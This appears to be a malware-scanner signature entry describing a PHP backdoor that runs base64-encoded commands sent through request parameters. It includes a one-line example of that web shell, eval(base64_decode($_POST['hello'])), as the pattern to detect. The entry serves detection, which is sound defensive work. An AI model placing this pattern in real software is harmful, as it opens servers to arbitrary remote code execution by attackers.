False Positive Probability: medium to low

This Code executes code that was sent by _POST, _GET etc. and crypted by base64 encoding. Attackers can use this script to execute any command they like.

Simplified example:

<?php
eval(base64_decode($_POST['hello']));
?>
{ISPP}r2h.malware.green.1